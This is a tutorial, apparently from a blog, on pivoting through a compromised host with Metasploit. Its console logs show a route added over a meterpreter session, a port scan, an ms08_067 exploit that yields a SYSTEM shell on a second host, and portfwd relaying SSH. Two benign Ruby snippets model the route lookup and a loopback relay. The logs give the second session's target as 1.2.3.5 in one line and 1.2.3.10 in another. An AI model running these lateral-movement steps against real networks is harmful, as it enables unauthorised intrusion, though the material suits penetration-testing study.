So you’ve owned a box and now you want to exploit others using the first as a pivot.
The first thing to do is to background your current meterpreter session so you are back at the msf prompt:

meterpreter > background
msf exploit(multi_handler) > sessions -l
Active sessions
===============
Id  Type                   Information                   Connection
--  ----                   -----------                   ----------
1   meterpreter x86/win32  XPSP0\Administrator @ XPSP0   81.142.243.100:21 -> 1.2.3.4:1050

Then add the pivot: route add [subnet] [netmask] [meterpreter session id]. The first argument is the network you want to reach through that session, not a single target: Metasploit masks the host bits when it matches, so 1.2.3.4 with a 255.255.255.0 netmask covers every host in 1.2.3.0/24 (the pivot’s own subnet), and any connection to one of those hosts is carried over session 1.

msf exploit(ms08_067_netapi) > route add 1.2.3.4 255.255.255.0 1
msf exploit(ms08_067_netapi) > route print
Active Routing Table
====================
Subnet             Netmask            Gateway
------             -------            -------
1.2.3.4            255.255.255.0      Session 1
msf exploit(ms08_067_netapi) >
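To make the route semantics concrete, here is a small Ruby model of the lookup msfconsole performs when a module opens a connection. It is an added illustration, not Metasploit’s own code, and the class and method names are invented; the addresses are the ones from the output above. It shows the two points that matter: the subnet argument is masked before matching, and when several routes match the most specific one wins, so a /32 added for a single host takes precedence over the /24 covering the pivot’s subnet.

```ruby
require 'ipaddr'

# Added illustration of how a "route add <subnet> <netmask> <session>" table
# resolves a destination to a session. Not Metasploit's code; the class and
# method names are invented for this example.
class PivotRoutes
  Route = Struct.new(:network, :session)

  def initialize
    @routes = []
  end

  # Equivalent of: route add <subnet> <netmask> <session id>
  # IPAddr drops the host bits, so ("1.2.3.4", "255.255.255.0") is stored as
  # 1.2.3.0/24, which is why the route in the post covers 1.2.3.10 even though
  # 1.2.3.4 was typed.
  def add(subnet, netmask, session)
    @routes << Route.new(IPAddr.new("#{subnet}/#{netmask}"), session)
    self
  end

  # Returns the session id to tunnel through, or nil when no route matches
  # (Metasploit then connects directly from the attacker's box).
  # Among matching routes the longest prefix wins.
  def session_for(target)
    best = @routes.select { |r| r.network.include?(target) }
                  .max_by { |r| r.network.prefix }
    best && best.session
  end

  # Lines in the spirit of "route print": masked network, prefix length, session
  def table
    @routes.map { |r| "#{r.network}/#{r.network.prefix}  Session #{r.session}" }
  end
end

if __FILE__ == $0
  routes = PivotRoutes.new.add("1.2.3.4", "255.255.255.0", 1)
  puts routes.table                  # 1.2.3.0/24  Session 1
  p routes.session_for("1.2.3.10")   # 1   -> scanned/exploited through session 1
  p routes.session_for("10.0.0.5")   # nil -> no pivot, direct connection
end
```

Adding a second, narrower route for one host (for example 1.2.3.10 with netmask 255.255.255.255 on a later session) redirects only that host; everything else in 1.2.3.0/24 keeps going through session 1.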

Now to run a TCP scan through the pivot 🙂 (the scanner never talks to 1.2.3.10 directly; each probe is a connection opened by the meterpreter on the first box):

msf exploit(ms08_067_netapi) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 1.2.3.10
RHOSTS => 1.2.3.10
msf auxiliary(tcp) > run
[*] 1.2.3.10:139 - TCP OPEN
[*] 1.2.3.10:135 - TCP OPEN
[*] 1.2.3.10:445 - TCP OPEN

Then simply exploit the second box from the same Metasploit console. Note the payload: windows/meterpreter/bind_tcp. With a bind payload it is Metasploit that connects to the target, and because of the route that connection goes through session 1. A reverse payload such as windows/meterpreter/reverse_tcp would need the target to open a connection back to your box, which is exactly what a host that is only reachable through the pivot usually cannot do.

msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    1.2.3.10         yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/bind_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST     1.2.3.10         no        The target address
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes)
[*] Meterpreter session 2 opened (81.142.243.100-1.2.3.4:0 -> 1.2.3.5:4444) at 2011-06-20 10:56:13 +0100

And to show the second session running through the first, we’ll list the sessions again:

meterpreter > background
msf exploit(ms08_067_netapi) > sessions -l
Active sessions
===============
  Id  Type                   Information                   Connection
  --  ----                   -----------                   ----------
  1   meterpreter x86/win32  XPSP0\Administrator @ XPSP0   81.142.243.100:21 -> 1.2.3.4:1050
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ XPSP0C  81.142.243.100-1.2.3.4:0 -> 1.2.3.10:4444

msf exploit(ms08_067_netapi) >

Sweet!!!

UPDATE:
I forgot to mention the ability to port forward from within a meterpreter session.
Let’s say target2 [1.2.3.10] had SSH on it and you wanted to connect to that SSH service but couldn’t do so directly. This is where the portfwd command comes in:

msf > sessions -i 1
meterpreter > portfwd add -l 44422 -p 22 -r 1.2.3.10
[*] Local TCP relay created: 0.0.0.0:44422 <-> 1.2.3.10:22

What the above does is map local TCP port 44422 on the attacker’s box to TCP port 22 on 1.2.3.10, with the connection carried over session 1 (this works independently of the route table). Note that the relay was bound to 0.0.0.0, so anything that can reach your box on port 44422 gets the same access to the target; pass -L 127.0.0.1 to portfwd if you only need it locally. Now simply connect to target2 from a console using:

ssh -p 44422 127.0.0.1

The above applies to any service; just map it to an unused local port. To save confusion, try to make the ports easy to understand: I pad the remote port with leading 4s to five digits.

remote:80   --> local:44480
remote:22   --> local:44422
remote:8080 --> local:48080
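What portfwd sets up is an ordinary TCP relay: a listener on the attacker’s box that, for each accepted client, opens a connection to the remote port (over the meterpreter channel in the real thing) and copies bytes in both directions until one side closes. The Ruby below is an added example, not Metasploit’s code, that does the same job on loopback so it can be run anywhere: a constructed echo service stands in for the hypothetical 1.2.3.10:22, the remote leg is a plain TCP connection instead of a meterpreter channel, and the relay is bound to 127.0.0.1 rather than 0.0.0.0 so only local tools (ssh -p 44422 127.0.0.1 and the like) can use it. Function names are invented.

```ruby
require 'socket'

# Added example of the relay that "portfwd add -l <lport> -p <rport> -r <rhost>"
# creates. Not Metasploit's code; function names are invented. The real relay
# carries the remote leg over the meterpreter session; here it is plain TCP.

# Copy bytes from src to dst until src hits EOF, then half-close dst so the peer
# sees EOF in that direction too (this is what lets ssh or nc exit cleanly).
def pump(src, dst)
  loop do
    dst.write(src.readpartial(4096))
  end
rescue EOFError, IOError, SystemCallError
  # peer closed or reset the connection
ensure
  begin
    dst.close_write
  rescue IOError, SystemCallError
  end
end

# Start the relay and return the port actually bound (0 lets the OS pick).
# listen_host matters: portfwd defaults to 0.0.0.0, so bind 127.0.0.1 unless
# you really want other hosts to reach the forward through your box.
def start_relay(listen_host, listen_port, remote_host, remote_port)
  server = TCPServer.new(listen_host, listen_port)
  Thread.new do
    loop do
      client = server.accept
      Thread.new(client) do |c|
        remote = nil
        begin
          remote = TCPSocket.new(remote_host, remote_port)
          up = Thread.new { pump(remote, c) }   # remote -> client
          pump(c, remote)                        # client -> remote
          up.join
        ensure
          c.close unless c.closed?
          remote.close if remote && !remote.closed?
        end
      end
    end
  end
  server.addr[1]
end

# Constructed stand-in for the remote service (the 1.2.3.10:22 of the post):
# it echoes whatever it receives. Returns the port it listens on.
def start_echo_service
  server = TCPServer.new('127.0.0.1', 0)
  Thread.new do
    loop do
      conn = server.accept
      Thread.new(conn) { |c| pump(c, c); c.close }
    end
  end
  server.addr[1]
end

# Connect through the relay, send a payload, and return what came back.
def relay_roundtrip(payload)
  echo_port  = start_echo_service
  relay_port = start_relay('127.0.0.1', 0, '127.0.0.1', echo_port)
  sock = TCPSocket.new('127.0.0.1', relay_port)
  sock.write(payload)
  sock.close_write   # like ssh/nc finishing: EOF travels client -> relay -> remote
  reply = sock.read  # ...and the remote's EOF travels back, ending the read
  sock.close
  reply
end

if __FILE__ == $0
  p relay_roundtrip("SSH-2.0-probe\r\n")   # "SSH-2.0-probe\r\n"
end
```

The half-close in pump is the detail that is easy to get wrong in a hand-rolled relay: without it the client never sees EOF from the remote side and interactive tools hang instead of exiting.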
